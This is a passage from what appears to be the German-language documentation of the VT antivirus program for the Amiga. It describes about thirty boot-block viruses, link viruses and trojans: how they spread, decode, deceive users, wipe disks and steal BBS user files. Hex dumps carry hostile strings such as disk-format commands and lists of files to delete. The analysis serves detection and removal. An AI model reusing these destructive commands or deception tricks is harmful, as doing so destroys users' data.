  6217.          wollen, schicken Sie mir bitte diese Programme zu. Danke !!
  6218.          Falls Sie weitere Text-Hunk-Varianten finden, die VT noch nicht
  6219.          kennt, schicken Sie mir bitte mehrere Beispiele zu. Danke !!
  6220.          VT bietet Ausbau an, weil ich in den mir bekannten Beispielen,
  6221.          keine Routinen gefunden habe, die fuer das eigentliche File zur
  6222.          Lauffaehigkeit notwendig gewesen waeren. (Solche Routinen
  6223.          koennten sein: Fastmem und/oder Cache aus).
  6224.          Arbeiten Sie zur Sicherheit mit einer Kopie. Danke !!
  6225.          Fuehren Sie nach dem Text-Hunk-Ausbau UNBEDINGT einen KOMPLETTEN
  6226.          Test durch, da erst jetzt Viren erkannt werden koennen.
  6227.          Negativ-Beispiel:
  6228.          DENISTRO.EXE
  6229.          Laenge mit Text-Hunks und Commander-Virus  71800 Bytes
  6230.          Laenge ALLES ausgebaut                     64844 Bytes
  6231.          In diesem File erkennt im Moment (25.11.94) beim Filetest
  6232.          KEIN AntiVirusProgramm den Commander-Virus. Ich gehe aber davon
  6233.          aus, dass bei den Updates das Problem behoben wird.
  6234.          VT2.68 (also schon zwei Monate alt) findet den Commander-Virus
  6235.          aber schon beim BlockKetteTest.
  6236.          Ziehen Sie bitte aus diesem Vorfall folgende Schluesse:
  6237.          - Formatieren Sie die RAD: lang nicht Quick
  6238.          - Entpacken Sie Archive aus Mailboxen in die RAD: und nicht ins
  6239.            RAM:
  6240.          - Geben Sie sich nicht mit einem Filetest zufrieden, sondern
  6241.            fuehren Sie auch einen BlockKetteTest durch.
  6242.  
  6243.  
  6244.    - THAHO8  BB     es ist KEIN Virus  Empfehlung: loeschen
  6245.          VT kennt: 21.10.92
  6246.          Die Format- und BB-Kopier-Routine im BB ab $1FE wird NIE er-
  6247.          reicht. Ueber Graphik wird auf schwarzem Hintergrund mit
  6248.          heller Schrift ausgegeben:
  6249.  
  6250.                  THAHO8 VIRUS V2.0
  6251.  
  6252.          Im BB ist zu lesen:
  6253.           00000000 54686973 20697320 74686520 ....This is the
  6254.           6D696768 74792054 6861686F 38205669 mighty Thaho8 Vi
  6255.           72757320 56322E30 21202045 61742073 rus V2.0!  Eat s
  6256.           6869742C 204C414D 45522120 20546861 hit, LAMER!  Tha
  6257.           686F2054 6861686F 20546861 686F2054 ho Thaho Thaho T
  6258.           6861686F 20546861 686F2054 6861686F haho Thaho Thaho
  6259.  
  6260.    - The FAT Stinkbomb 2  BB   EXTREME-Clone
  6261.          Bei mir FAT 2 Virus siehe oben
  6262.  
  6263.    - The FAT Stinkbomb 1  BB   TimeBomb V1.0-Clone
  6264.          Bei mir FAT 1 Virus siehe oben
  6265.  
  6266.    - The Return of STARCOM    siehe bei STARCOMReturn
  6267.  
  6268.    - THE SMILY CANCER   LinkVirus, verlaengert das Prg. um 3916 Bytes
  6269.          Fastmem ja, im Speicher immer ab $7F000, KickTag, KickCheckSum,
  6270.          SumKickData, im Prg. noch BeginIo und $6c = Vec3
  6271.          PrgTeile decodiert mit ror.b #2,d1 oder codiert mit rol.b #2,d1
  6272.          befaellt das erste File der startup-sequence,
  6273.          testet  n i c h t  auf Sonderzeichen im Filenamen,
  6274.          d.h. jedes File wird befallen
  6275.          nach 20 Vermehrungen:
  6276.          Mauszeiger aendert sich in gelben Kopf (smily) mit blauem Hut
  6277.          und Endlosausgabe einer roten Laufschrift:
  6278.    "????????.........."
  6279.    " HI THERE!!! A NEW AGE IN VIRUS MAKING HAS BEGUN!!!"
  6280.    " THANX TO US... THANKX TO: --- CENTURIONS ---  "
  6281.    " AND WE HAVE THE PLEASURE TO INFORM YOU THAT SOME"
  6282.    " OF YOUR DISKS ARE INFECTED BY OUR FIRST MASTERPIECE"
  6283.    " CALLED: ` THE SMILY CANCER `  "
  6284.    " HAVE FUN LOOKING FOR IT... AND STAY TUNED FOR OUR NEXT PRODUCTIONS.  "
  6285.    " CENTURIONS: THE FUTURE IS NEAR!"
  6286.    "                     "
  6287.  
  6288.    Ausserdem ist im decodierten Prg noch zu lesen:
  6289.    (erscheint nicht in der Laufschrift)
  6290.    HELLO HACKERS OUT THERE!! A NEW FORCE HAS BORN IN ITALY:
  6291.    --- CENTURIONS ---. OUR TEAM IS COMPOSED OF 2 GUYZ:
  6292.    ME & HIM.(AHAHHA!)
  6293.    THE AIM OF - - CENTURIONS - - IS JUST VIRUS MAKING..
  6294.    WE HAVE LOTTA FUN DOING THIS AND WE ALSO HOPE TO GIVE FUN TO THE
  6295.    KILLERS MAKERS (HI STEVE TIBBETT!) HAW! HAW! HAW!
  6296.     SIGNED: ME & HIM / CENTURIONS
  6297.    Hinweis: Ich besitze ein Smily-File mit vier Links
  6298.    Hinweis 96-11-03: Ab KS2.04 und hoeher zerstoert das Virusteil beim
  6299.      Anlinken die Disk-Struktur (vgl. VT-Blockkette Fehlermeldung "Data-
  6300.      BlockList<>FirstDataBlock". Das gelinkte File kann dann unter KS2.04
  6301.      und hoeher von VT nur als "File defekt?" erkannt werden. Versuchen
  6302.      Sie mit einem Filemonitor ab KS2.04 so ein File anzuschauen, dann
  6303.      werden Sie eine Fehlermeldung erhalten. Wichtig: Diese Aussagen gelten
  6304.      NUR, wenn das gelinkte File unter KS2.04 oder hoeher erzeugt wurde.
  6305.      Gelinkte Files die unter KS1.2 oder KS1.3 erzeugt wurden, werden von
  6306.      VT auch unter KS2.04 und hoeher erkannt und ausgebaut, da ja die File-
  6307.      struktur in Ordnung ist.
  6308.  
  6309.    - The Smily Cancer II   Filevirus  Laenge: 4676  2x verschluesselt
  6310.       nach 1x entschluesseln mit   eori.b #$90,d1
  6311.                                    subi.b #$22,d1
  6312.       kann man am Fileende lesen:
  6313.             CENTURIONS STRIKES BACK: THE SMILY CANCER II
  6314.  
  6315.       Beim Starten des Programms wird der loadwb-Befehl simuliert und
  6316.       das Virusteil setzt sich im Speicher fest. Die Vermehrung erfolgt
  6317.       dann als Smily 1, d.h. es findet KEINE Vermehrung als Smily II
  6318.       statt. siehe oben
  6319.  
  6320.     Hinweis: Es wird ein Smily-File (Laenge 4792 Bytes, ab $200 im
  6321.          File Text zu lesen) in Deutschland weitergegeben, das
  6322.          NICHT lauffaehig ist (April 92). Dieses Prg wird von VT  NICHT
  6323.          erkannt, da keine Gefahr besteht. Lasst solche Scherze und
  6324.          verunsichert nicht die Amiga-Benutzer !!!!
  6325.     Hinweis 03.09.92: Ab VT2.44 sollten mehrere SmilyLinks ans gleiche
  6326.       File in einem Durchgang ausgebaut werden. Falls nein, melden Sie
  6327.       sich bitte. Danke
  6328.     Hinweis 16.04.93: Es ist ein Smily Clone aufgetaucht.
  6329.       Laenge: verlaengert ein File um 3916 Bytes
  6330.       FAST KEIN mit Absicht verseuchtes File war lauffaehig. Das laesst
  6331.       den Schluss zu, dass der addbuffers-befehl von Hand manipuliert
  6332.       wurde.
  6333.       VT hat die Files wieder auf die Original-Laenge verkuerzt und die
  6334.       Startup-Sequence war danach wieder lauffaehig.
  6335.       Unterschied zu Original: Der Sprung-Befehl zur Decodier-Routine
  6336.       wurde geaendert.
  6337.       weiteres Verhalten: siehe oben
  6338.     Hinweis 12.06.93: Es tauchen immer haeufiger defekte Smily-Files auf.
  6339.       VT sollte beim Ausbauversuch eine defekte Hunk-Struktur erkennen
  6340.       und das Loeschen des Files anbieten. Bitte vergessen Sie dann nicht,
  6341.       die Startup-Sequence zu ueberpruefen und bei Bedarf das unverseuchte
  6342.       Originalfile neu aufzukopieren.
  6343.     SMILY-CANCER defekt: File
  6344.       Ein Beispiel: Nach Fileheader muesste das File aus vier Hunks be-
  6345.       stehen. Jemand hat nun nach dem Virusteil das File abgeschnitten.
  6346.       Da ist dann natuerlich ein Ausbau nicht sinnvoll.
  6347.  
  6348.    - The Traveller 1.0
  6349.       KickTag, KickCheckSum, im Prg. DoIo u. $6c, immer $7F000
  6350.       abhaengig vom Zaehlerstand: Textausgabe
  6351.          roter,gruener und blauer Balken, schwarze Schrift
  6352.             NEVER HEARD OF VIRUS-PROTECTION ??? -LAMER !!!
  6353.       Vermehrung und Schaden: BB   (auch HD !!!!!!!!!)
  6354.  
  6355.    - Tick
  6356.          siehe unter Julie
  6357.  
  6358.    - TimeBomb V0.9    Trojanisches Pferd
  6359.       wird mit dem Prg. BMassacre erzeugt (da steht auch TimeBomb V0.9)
  6360.       siehe auch BB-MASSACRE
  6361.       besteht aus 2 Teilen in SubDir c und Root:
  6362.          in c: .info      = Virus   Laenge: 7840 Bytes
  6363.       in Root: pic.xx     = Zaehler (Startwert=6)  Laenge: 1 Byte
  6364.       in der 1.Zeile der startup steht: c/.info
  6365.       nicht resident, keine Vermehrungsroutine in .info
  6366.       Verhalten: vermindert bei jedem Neustart den Wert in pic.xx um 1 .
  6367.       Sobald 0 erreicht ist, wird die Disk formatiert (Track 0-159) .
  6368.       Damit der Wert in pic.xx geaendert werden kann, darf die Disk
  6369.       nicht schreibgeschuetzt sein. Falls doch, erscheint:
  6370.          User Request : Please remove write Protection and press
  6371.                         left Mouse Button to continue..
  6372.       Eine weitere Abarbeitung der startup-sequence ist ohne Oeffnung
  6373.       der Disk nicht moeglich.
  6374.       Im Cli wird immer ausgegeben:
  6375.             RAM CHECKED - NO VIRUS FOUND.
  6376.  
  6377.    - TimeBomb V0.9 Clone   Trojanisches Pferd
  6378.          Wird von VT als Timebomb erkannt.
  6379.       besteht aus 2 Teilen in SubDir c und Root:
  6380.          in c: .info      = Virus   Laenge mit PP: 1584 Bytes
  6381.       in Root: setmap     = Zaehler (Startwert=FF)  Laenge: 1 Byte
  6382.       in der 1.Zeile der startup steht: c/.info
  6383.       nicht resident, keine Vermehrungsroutine in .info
  6384.       Verhalten: vermindert bei jedem Neustart den Wert in setmap um 1 .
  6385.       Sobald 0 erreicht ist, wird die Disk formatiert (Track 0-150) .
  6386.       Textausgabe danach:
  6387.          Hey Looser ! Boot again !
  6388.       Damit der Wert in df0:setmap geaendert werden kann, darf die Disk
  6389.       nicht schreibgeschuetzt sein. Falls doch, erscheint:
  6390.          User Request : Please remove write Protection and press
  6391.                         left Mouse Button to continue..
  6392.       Eine weitere Abarbeitung der startup-sequence ist ohne Oeffnung
  6393.       der Disk nicht moeglich.
  6394.       Im Cli wird ausgegeben:
  6395.             DISC SPEEDER BY BUD usw
  6396.       VT bietet im FileTest loeschen an und sucht auch nach setmap (1Byte).
  6397.       Falls gefunden, wird auch setmap im Rootverzeichnis geloescht.
  6398.  
  6399.  
  6400.    - TimeBomb V1.0  BB-Virus
  6401.      ( verbiegt keine "bekannten" Zeiger )
  6402.      (je nach Zaehlerstand wird eigener BootBlock geschrieben,
  6403.      (( Einsprung bei #$70208))
  6404.      oder Track 80 (Directory) mit Speicherinhalt ab #$20000 ueberschrieben
  6405.          = Disk wird unlesbar !!!)
  6406.      (( Einsprung bei #$70026))
  6407.      Sichert eigenen Speicher NICHT. Kann also ueberschrieben werden !!!
  6408.      Clone: FAT 1 Virus, O.M.S.A Virus, Lame Game Virus, TAI4-Virus,
  6409.  
  6410.    - Time Bomber    Trojanisches Pferd
  6411.       wird mit dem Prg. TimeBomber erzeugt
  6412.       besteht aus 2 Teilen in RootDir:
  6413.       virustest         = Virus   Laenge: 936 Bytes
  6414.       virustest.data    = Zaehler (Startwert=5)  Laenge: 1 Byte
  6415.       in der 1.Zeile der startup steht: virustest
  6416.       nicht resident, keine Vermehrungsroutine in virustest
  6417.       Verhalten: vermindert bei jedem Neustart den Wert in virustest.data
  6418.       um 1 .Sobald 0 erreicht ist, wird die Disk formatiert.
  6419.       Damit der Wert in virustest.data geaendert werden kann, darf die
  6420.       Disk nicht schreibgeschuetzt sein. Falls doch, erscheint:
  6421.          User Request : Please remove write Protection and press
  6422.                         left Mouse Button to continue..
  6423.       Eine weitere Abarbeitung der startup-sequence ist ohne Oeffnung
  6424.       der Disk nicht moeglich.
  6425.       Im Cli wird immer ausgegeben:
  6426.             RAM checked - no virus found.
  6427.  
  6428.    - Time Bomber-Inst.    File
  6429.       Laenge gepackt:   17464 Bytes
  6430.       Laenge ungepackt: 45640 Bytes
  6431.       Programm um nach DF0: die 2 Time Bomber Files (s.o.) zu schreiben.
  6432.       Wird von selbst NICHT aktiv.
  6433.       Keine verbogenen Vektoren.
  6434.       VT bietet loeschen an.
  6435.  
  6436.    - Timer-Virus   Files
  6437.        2 Files: timer   Laenge:4812     setmap  Laenge:1712
  6438.        Verbiegt $74 (ZeroPage)  Verbiegt $74 VecPage NICHT
  6439.           (Hallo Enforcer-Freunde)
  6440.        Beim timer-File handelt es sich um das install-Programm.
  6441.        Zur Taeuschung wird ein Fenster (V1.1) geoeffnet und es erfolgt
  6442.        die Ausgabe:      Ram  ....
  6443.                          Chip ....
  6444.                          Time ....
  6445.                          Date ....
  6446.        In Wirklichkeit wird aber versucht :c/setmap und/oder :system/setmap
  6447.        zu kopieren. Die Unterverzeichnisse muessen existieren und koennen
  6448.        vom timer-Prg NICHT angelegt werden. Nachweis: z.B. snoopdos
  6449.        Das timer-File enthaelt das setmap-File uncodiert.
  6450.  
  6451.        Beim naechsten reset wird nun der falsche setmap-Befehl aufgerufen,
  6452.        wenn er in ihrer s.-seq. steht.
  6453.                      - installiert Zeichensatz
  6454.                      - verbiegt $74 auf eigene Routine
  6455.                      - oeffnet console.device
  6456.  
  6457.        $74-Routine:
  6458.                      - arbeitet am seriellen Port
  6459.                       $DFF018, $DFF019
  6460.                      - testet nach meiner Meinung eingehende Zeichen
  6461.                      - hat den execute-Befehl
  6462.                      - enthaelt eine Zeitschleife
  6463.                      - am Schluss jmp Orig.-$74
  6464.        Koennte ein Prg. sein, um in eine Mailbox einzubrechen ????
  6465.        $74-Erkennung mit VT getestet    : 29.09.92
  6466.        timer-Erkennung mit VT getestet  : 29.09.92
  6467.        setmap-Erkennung mit VT getestet : 29.09.92
  6468.        Empfehlung: loeschen Sie die beiden Files mit VT und kopieren Sie
  6469.                    bei Bedarf das setmap-File neu auf.
  6470.        Zeichen, die so im Orig_Setmap_File NICHT vorkommen:
  6471.            00004E75 72616D64 72697665 2E646576 ..Nuramdrive.dev
  6472.            69636500 636F6E73 6F6C652E 64657669 ice.console.devi
  6473.            63650000 3A646576 732F6B65 796D6170 ce..:devs/keymap
  6474.            732F6400 00000000 00000000 00000000 s/d.............
  6475.            646F732E 6C696272 61727900 00000000 dos.library.....
  6476.            .
  6477.            .
  6478.            .
  6479.            00000000 00000000 00000000 646F732E ............dos.
  6480.            6C696272 61727900 52414D3A 436F6D6D library.RAM:Comm
  6481.            616E642D 30302D54 30310000 00000000 and-00-T01......
  6482.  
  6483.  
  6484.    - TNK    noch ein SCA-Clone          08.04.92
  6485.         im BB zu lesen:
  6486.            32162054 68697320 77617320 54686520 2. This was The
  6487.            4e657720 4b696420 dc6e0000 4ef90000 New Kid .n..N...
  6488.            0000412e 544e4b21 544e4b21 544e4b21 ..A.TNK!TNK!TNK!
  6489.            544e4b21 544e4b21 544e4b21 544e4b21 TNK!TNK!TNK!TNK!
  6490.  
  6491.    - Tomates-Gentechnic-Service  = TimeBomb-BB-Clone
  6492.             nur der Text wurde veraendert
  6493.  
  6494.    - Tomates-Gentechnic-Service 2 = Coder.BB
  6495.         Wieder eine Meisterleistung. Der Text wurde geaendert.
  6496.         Lesen Sie bitte bei Coder.BB nach.
  6497.         Im BB ist zu lesen:
  6498.            546f6d61 7465732d 47656e74 6563686e Tomates-Gentechn
  6499.            69632d53 65727669 63652032 2e30202d ic-Service 2.0 -
  6500.            2d2d2054 68652042 65737420 696e2045 -- The Best in E
  6501.            75726f70 65203139 39322021 21201400 urope 1992 !! ..
  6502.               ;.......
  6503.            8059a5c9 d5cd8084 8400416e 74697669 .Y........Antivi
  6504.            7275732d 436f6465 20426567 696e2024 rus-Code Begin $
  6505.            37666130 302d59a5 c9d5cd80 84842d45 7fa00-Y.......-E
  6506.            6e642024 37666134 3020446f 6e742069 nd $7fa40 Dont i
  6507.            6e737461 6c6c2074 68697320 4d414749 nstall this MAGI
  6508.            432d424f 4f54424c 4f434b20 4265726c C-BOOTBLOCK Berl
  6509.            696e204a 756c7927 393259a5 c9d5cd80 in July'92Y.....
  6510.            84486176 65206120 676f6f64 20776179 .Have a good way
  6511.  
  6512.         Im Speicher wird mit ror.b #2,d1 und FALSCHER Laenge decodiert:
  6513.            20202020 2020746f 6d617465 732d6765       tomates-ge
  6514.            6e746563 686e6963 2d736572 76696365 ntechnic-service
  6515.            20212120 67726565 74696e67 7320746f  !! greetings to
  6516.            2065696e 732d676d 62682061 6e64206b  eins-gmbh and k
  6517.            6f626f6c 2d646174 61202121 21202056 obol-data !!!  V
  6518.  
  6519.    - TOPDOG    anderer Name: Top util  s.u.
  6520.  
  6521.    - Top util Virus  Laenge ungepackt: 2260 Bytes
  6522.      Namensbegruendung:
  6523.      Top util By Zacker of EnSoniC V1.0 ist im File zu lesen.
  6524.      Wurde mir ungepackt zugeschickt. Wird deshalb von VT nur unge-
  6525.      packt erkannt. Bleibt NICHT im Speicher, deshalb keine Speicher-
  6526.      erkennung notwendig. Von der Definition kein Virus, da keine Ver-
  6527.      mehrung. Ein Zerstoerungsfile gegen BBS gerichtet. Also fuer den
  6528.      User ohne Mail-Box ungefaehrlich. Versucht durch Cli-Ausgabe zu
  6529.      taeuschen:
  6530.              Top util By Zacker of EnSoniC V1.0
  6531.         Call Zack BBS 16.8 HST 407-232-6324 HST ONLY !!
  6532.  
  6533.     USEAGE: Top (num /ALL) <-Hfname> <-Sfname> <-Ttext>
  6534.     num : Min. megs to get on the list
  6535.     ALL : Show all users (default to BBS:User.rpt)
  6536.     -H  : Use the file name after -H as the TOP hdr
  6537.           if no -s is used default =  BBS:user.rpt
  6538.     -T  : text to be used with top dog
  6539.         : TOPDOG (I just added)
  6540.     -S  : Use the file name after -S as TOP list
  6541.  
  6542.      Schaden in Wirklichkeit:
  6543.      bbs:user.data wird mit Laenge 66 Bytes neu angelegt, d.h. ein
  6544.      altes user.data-file geht verloren:
  6545.      0000: 0CEBEAE5 EAA0F4E9 E9E9F4E7 B4A0E9F7 
  6546.      0010: EDF6E5F7 E5F7E9A0 E9F2E5F7 E7E5F7A0 
  6547.      0020: 67726577 67206565 20200A20 54686520 grewg ee  . The
  6548.      0030: 54687265 65204D75 736B6574 65657273 Three Musketeers
  6549.      0040: 200A
  6550.      Fileerkennung mit VT : 02.11.92
  6551.      Empfehlung: File einfach loeschen
  6552.  
  6553.    - Trabbi  Link  anderer Name: Hochofen  s.o.
  6554.  
  6555.    - Trainer-Trojan    File   Zerstoerung
  6556.       Filename: Trainer.exe
  6557.       Laenge gepackt: 592 Bytes
  6558.       VT bietet Loeschen an.
  6559.       Im entpackten File ist zu lesen:
  6560.                              00006262 733a636f         ..bbs:co
  6561.            6e66636f 6e666967 2e696e66 6f006262 nfconfig.info.bb
  6562.            733a7573 65722e64 61746100 6c696273 s:user.data.libs
  6563.            3a616564 6f6f722e 6c696272 61727900 :aedoor.library.
  6564.            6c696273 3a426f6f 74626c6f 636b2e6c libs:Bootblock.l
  6565.            69627261 7279006c 6962733a 61652e6c ibrary.libs:ae.l
  6566.            69627261 7279006c 6962733a 6578706c ibrary.libs:expl
  6567.            6f64652e 6c696272 61727900 6c696273 ode.library.libs
  6568.            3a46696c 6549442e 6c696272 61727900 :FileID.library.
  6569.            4c696273 3a667265 65616e69 6d2e6c69 Libs:freeanim.li
  6570.            62726172 79006c69 62733a69 66667061 brary.libs:iffpa
  6571.            7273652e 6c696272 61727900 6c696273 rse.library.libs
  6572.            3a726571 746f6f6c 732e6c69 62726172 :reqtools.librar
  6573.            79006c69 62733a74 72616e73 6c61746f y.libs:translato
  6574.            722e6c69 62726172 79006c69 62733a78 r.library.libs:x
  6575.            70727a6d 6f64656d 2e6c6962 72617279 przmodem.library
  6576.       Schaden:
  6577.         Einige Files (s.o.) sollen mit dosdelete geloescht werden.
  6578.       Versuchen Sie bei Bedarf mit DiskSalv eine Rettung.
  6579.  
  6580.  
  6581.    - Traveling Jack
  6582.       LinkVirusPrg mit variabler HunkLaenge
  6583.       verbiegt DosBase+$2E  (= dos.library-Zeiger ins ROM), nicht resetfest
  6584.       a) schreibt ein File auf Disk VIRUS.xy   Laenge immer 198 Bytes
  6585.          x u. y sind HexZahlen, die ueber $BFE801 bestimmt werden.
  6586.  
  6587.          Text in VIRUS.xy:
  6588.       The Traveling Jack....
  6589.       I'm traveling from town to town looking for respect,
  6590.       and all the girls I could lay down make me go erect.
  6591.                             -Jack, 21st of September 1990
  6592.  
  6593.       b) linkt sich an andere Prg.e
  6594.       Bedingungen:
  6595.       DOS0-Disk, Disk validated, 12 Bloecke frei auf Disk, Filelaenge
  6596.       mind. 2000 Bytes, FileName mind. 5 Zeichen, FileName enthaelt
  6597.       kein Zeichen kleiner als $40,
  6598.       kein Info.File
  6599.       Typ A:
  6600.       LinkHunkLaengenBerechnung:
  6601.       $24C + Wert aus $DFF006
  6602.       decodiert im Speicher $909+1 Bytes
  6603.       Typ B:
  6604.       LinkHunkLaengenBerechnung:
  6605.       $25B + Wert aus $DFF006
  6606.       decodiert im Speicher $945+1 Bytes
  6607.  
  6608.    - Travelling Jack 3  gibt es nicht, es handelt sich um Typ B, glauben
  6609.       Sie mir. Einige andere VirenChecker machen einen Fehler, indem sie
  6610.       die Hunklaengenaenderung nicht beachten und erkennen deshalb nur
  6611.       EINEN Typ B, obwohl mehrere moeglich sind. (Stand 28.09.91)
  6612.  
  6613.    - Trick-Gag   Empfehlung Loeschen
  6614.       anderer moeglicher Name: Shocked-Gag
  6615.       bekannter Archivname: Trick.zip   Laenge: 84606 Bytes
  6616.       Im Archiv ist zu lesen:
  6617.           00000000 0000000f 04250000 00537973 .........%...Sys
  6618.           3a53686f 636b6564 2e696666 504b0102 :Shocked.iffPK..
  6619.             ;...
  6620.           00000000 0f0464a2 00005379 733a5762 ......d...Sys:Wb
  6621.           53746172 7475702f 54726963 6b504b01 Startup/TrickPK.
  6622.             ;...
  6623.           00000000 000f0470 a3000053 79733a50 .......p...Sys:P
  6624.           5053504b 01021401 14000000 0800c4b5 PSPK............
  6625.             ;...
  6626.           5379733a 57625374 61727475 702f5472 Sys:WbStartup/Tr
  6627.           69636b2e 696e666f 504b0506          ick.infoPK..
  6628.       Beim Entpacken wird kopiert nach:
  6629.         Sys:       Shocked.iff   57694 Bytes
  6630.                    PPS           66088 Bytes
  6631.         WbStartup: Trick           328 Bytes
  6632.                    Trick.info     3619 Bytes
  6633.       Das Trick-Programm wird beim naechsten Reset aufgerufen.
  6634.       Im Programm ist zu lesen:
  6635.           42804e75 5379733a 50505320 5379733a B.NuSys:PPS Sys:
  6636.           53686f63 6b65642e 69666600          Shocked.iff.
  6637.       Mit DOS-Execute wir Sys:PPS Sys:Shocked.iff ausgefuehrt, also
  6638.       ein Bild angezeigt. Sie sehen dann in grossen Buchstaben
  6639.       Shocked. Mit der Esc-Taste koennen Sie weitermachen. Loeschen
  6640.       Sie einfach diese vier Files. Weitere Schaeden sind nicht
  6641.       bekannt.
  6642.  
  6643.    - TRIPLEX-Virus    BB    Cool, DoIo  auch KS2.04
  6644.          belegt im Speicher $800 Bytes, ist 2x im Speicher
  6645.       Vermehrung und Schaeden: BB
  6646.       VirusPrg. meldet sich NICHT
  6647.       im BB ist zu lesen:
  6648.          This nice little Virus was written in 1990  usw.
  6649.  
  6650.    - TRISECTOR 911 Virus BB   immer $7F000
  6651.       KS2.04 : nein
  6652.       fordert trackdisk.device NICHT
  6653.       KickTag, KickChecksum
  6654.       nach 1. Reset auch:
  6655.       DoIo,
  6656.       Vermehrung und Schaeden:
  6657.          BB und  $94(a6) fuer Zeitbestimmung
  6658.  
  6659.    - TRISTAR-Viruskiller V1.0
  6660.       Es ist NICHT der Original TRISTAR- BB gemeint, sondern jemand hat
  6661.       den Text in einen Target-BB  (sehr kurzer Code) eingesetzt.
  6662.       Oh, ihr Anfaenger !!   VT erkennt Target  s.o.
  6663.  
  6664.    - Trojan   BB  anderer Name: Incognito    s.o.
  6665.  
  6666.    - TROJAN 3.0  File Laenge ungepackt: 10536 Bytes
  6667.          Einbruchsprogramm gegen BBS, also fuer Normaluser ohne Mailbox
  6668.          ungefaehrlich. Empfehlung: einfach loeschen
  6669.          Versucht durch Cli-Ausgabe zu taeuschen:
  6670.  
  6671.   TROJAN KILLER V3.0  (23/8/92)
  6672.  
  6673.   Please enter the full path U have to your download dir
  6674.   < eg. BBS:warez/upload >
  6675.   The directory?:
  6676.   Checking for known trojans on harddisk...
  6677.   Report: 0 trojan(s) found'
  6678.   Checking for known trojans in memory...!
  6679.   Trojan(s) found on harddisk   : 0!
  6680.   Trojan(s) found in memory     : 0
  6681.   Please contact ->NYLONMAN<- for new trojan killers!!!
  6682.   Note: This program only works on AmiExpress 1.xx and 2.xx Press <<ENTER>>
  6683.  
  6684.     in Wirklichkeit:
  6685.         liest aus:
  6686.               BBS:user.data
  6687.         legt ab in:
  6688.               /demo99.lha
  6689.  
  6690.         liest aus:
  6691.               BBS:user.keys
  6692.         legt ab in:
  6693.               /demo98.lha
  6694.     Es handelt sich natuerlich NICHT um lha-Files. Die Files werden in dem
  6695.     Unterverzeichnis abgelegt, das Sie oben nach ?: eingegeben haben.
  6696.     Loeschen Sie bitte diese zwei "lha"-Files von Hand.
  6697.     Trojan-File-Erkennung mit VT getestet: 20.10.92
  6698.  
  6699.    - TRUSTNOONE-Trojan    Zerstoerung
  6700.          anderer moeglicher Name: visions-Trojan
  6701.          Filenamen: Visions.020  Laenge: 130048 Bytes
  6702.                     Visions.030  Laenge: 132396 Bytes
  6703.          Entpackt ist im File zu lesen:                   
  6704.             733a7379 7374656d 2f666f72 6d617420 s:system/format
  6705.             64726976 65206466 303a206e 616d6520 drive df0: name
  6706.             54525553 542d4e4f 4f4e4500 646f732e TRUST-NOONE.dos.
  6707.          oder:
  6708.             fffffffe 7379733a 73797374 656d2f66 ....sys:system/f
  6709.             6f726d61 74206472 69766520 7379733a ormat drive sys:
  6710.             206e616d 65205452 5553542d 4e4f4f4e  name TRUST-NOON
  6711.             45207175 69636b00 646f732e 6c696272 E quick.dos.libr
  6712.          Soll also df0: oder sys: formatieren. Da einmal mit quick
  6713.          formatiert wird, sollten Sie DiskSalve zur Rettung ver-
  6714.          suchen.
  6715.  
  6716.    - TTS-Virus  BB   siehe oben bei BadBytes1-Virus
  6717.  
  6718.    - TURK_V1.3      Cool, DoIo, im Speicher immer $7f000
  6719.          schreibt TURK nach $60
  6720.          Vermehrung: ueber BB
  6721.          Textausgabe (entschluesselt mit subq #6,d0) ueber DisplayAlert:
  6722.             Amiga Failure... Cause: TURK VIRUS Version 1.3!
  6723.          im BB sichtbar: TURK
  6724.  
  6725.    - TWINZ SANTA CLAUS    Coder-Clone  s.o.
  6726.          Text geaendert im BB: THE SANTA CLAUS VIRUS !!!! usw.
  6727.  
  6728.    - U.K.LamerStyle   anderer Name: Clist-Virus  s.o.
  6729.    - U.K.Lame Style   anderer Name: Clist-Virus  s.o.
  6730.  
  6731.    - UA62-ACP-Trojan
  6732.       siehe auch bei CLP-Trojan, PHA Trojan
  6733.       Gefunden in Archiv ua62.lha   Laenge: 28761 Bytes
  6734.       ZerstoerungsFile:
  6735.       Mit 3E8-Hunk und gepackt: Laenge 26868 Bytes
  6736.       Entpackt:                 Laenge 51956 Bytes
  6737.       Schadensteil ausgebaut  : Laenge 45616 Bytes
  6738.       Keine verbogenen Vektoren.
  6739.       Keine Vermehrung
  6740.       Namensbegruendung: siehe Auszug
  6741.       Schaden:
  6742.       Schreibt in alle Files in S: egal ob Data oder Prg. einen Text.
  6743.       Ed-startup vorher:
  6744.            73692030 20203120 2250726f 6a656374 si 0  1 "Project
  6745.            220a7369 20312020 3220224f 70656e2e ".si 1  2 "Open.
  6746.            2e2e2020 20204553 436f7022 20226f70 ..    ESCop" "op
  6747.            203f202f 46696c65 3a202f22 0a736920  ? /File: /".si
  6748.            32202034 0a736920 33202032 20225361 2  4.si 3  2 "Sa
  6749.       Ed-startup nachher:
  6750.            64522e57 486f206f 4620414c 46202841 dR.WHo oF ALF (A
  6751.            4c69454e 204c6946 4520466f 524d2920 LiEN LiFE FoRM)
  6752.            57695348 45532055 2041204d 45525259 WiSHES U A MERRY
  6753.            20582d4d 41532165 3a202f22 0a736920  X-MAS!e: /".si
  6754.            32202034 0a736920 33202032 20225361 2  4.si 3  2 "Sa
  6755.       Manchmal wurden die Files auch mit dem Text versehen und der Rest
  6756.       mit Speichermuell gefuellt. Dies war abhaengig vom Prozessortyp.
  6757.       Ed-startup nachher 2:
  6758.            64522e57 486f206f 4620414c 46202841 dR.WHo oF ALF (A
  6759.            4c69454e 204c6946 4520466f 524d2920 LiEN LiFE FoRM)
  6760.            57695348 45532055 2041204d 45525259 WiSHES U A MERRY
  6761.            20582d4d 4153214b 200b0200 00fc2640  X-MAS!K .....&@
  6762.            221b0c41 03ec6650 48416138 2409524b "..A..fPHAa8$.RK
  6763.       Die Files werden unbrauchbar und VT bietet loeschen an. Die
  6764.       Wirkungsweise ist also aehnlich wie bei CLP-Trojan.
  6765.       Fileerkennung:
  6766.       VT erkennt 3E8-Hunk und bietet Ausbau an.
  6767.       Nach dem Ausbau erkennt VT Powerpacker. Bitte entpacken Sie das
  6768.       File mit Powerpacker. Sie stellen dann fest, dass es sich um
  6769.       einen 4EB9-4EF9-Link handelt. VT erkennt jetzt beim Filetest
  6770.       UA62-ACP-Trojan und bietet Ausbau an (hoffe ich). Das entstehende
  6771.       File hat etwas mit BBS zu tun. Mehr kann ich dazu nicht sagen,
  6772.       da ich das Mailbox-Prg. nicht habe. Ich bekomme dann die Meldung:
  6773.       acp.info nicht gefunden oder tooltype NODES fehlen usw. . Sind Sie
